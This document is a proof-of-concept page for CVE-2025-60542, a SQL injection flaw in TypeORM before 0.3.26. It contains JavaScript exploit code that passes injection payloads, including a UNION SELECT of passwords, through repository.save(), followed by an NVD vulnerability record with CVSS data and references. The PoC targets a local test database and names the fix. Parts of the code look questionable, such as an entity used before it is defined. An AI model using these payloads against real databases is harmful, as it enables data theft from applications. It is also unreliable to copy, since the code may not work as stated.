CVE-2025-60542

// CVE-2025-60542 PoC - TypeORM SQL Injection // This PoC demonstrates SQL injection via repository.save() // Vulnerable versions: TypeORM < 0.3.26 const { DataSource } = require('typeorm'); // Initialize TypeORM datasource const dataSource = new DataSource({ type: 'mysql', host: 'localhost', port: 3306, username: 'root', password: 'password', database: 'testdb', entities: [User], }); // User entity definition class User { constructor() { this.id = undefined; this.username = ''; this.email = ''; } } async function exploitSQLInjection() { await dataSource.initialize(); const userRepository = dataSource.getRepository(User); // Malicious payload - SQL injection via username field // This payload attempts to comment out the rest of the query const maliciousUser = new User(); maliciousUser.username = "admin'; --"; maliciousUser.email = '[email protected]'; try { // This call becomes vulnerable when stringifyObjects is false const savedUser = await userRepository.save(maliciousUser); console.log('User saved:', savedUser); } catch (error) { console.error('Error:', error.message); } // More dangerous payload - attempting to extract data const dataExtractionPayload = new User(); dataExtractionPayload.username = "' UNION SELECT password FROM users WHERE '1'='1"; dataExtractionPayload.email = '[email protected]'; try { await userRepository.save(dataExtractionPayload); } catch (error) { console.log('SQL Injection detected in error:', error.message); } await dataSource.destroy(); } // Run the exploit // exploitSQLInjection(); // Mitigation: Upgrade to TypeORM 0.3.26 or later // npm install [email protected]

{"cve": {"id": "CVE-2025-60542", "sourceIdentifier": "[email protected]", "published": "2025-10-29T16:15:34.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection vulnerability in TypeORM before 0.3.26 via crafted request to repository.save or repository.update due to the sqlstring call using stringifyObjects default to false."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/typeorm/typeorm/pull/11574", "source": "[email protected]"}, {"url": "https://github.com/typeorm/typeorm/releases/tag/0.3.26", "source": "[email protected]"}, {"url": "https://github.com/typeorm/typeorm/releases?q=security&expanded=true", "source": "[email protected]"}, {"url": "https://medium.com/@alizada.cavad/cve-2025-60542-typeorm-mysql-sqli-0-3-25-a1b32bc60453", "source": "[email protected]"}]}}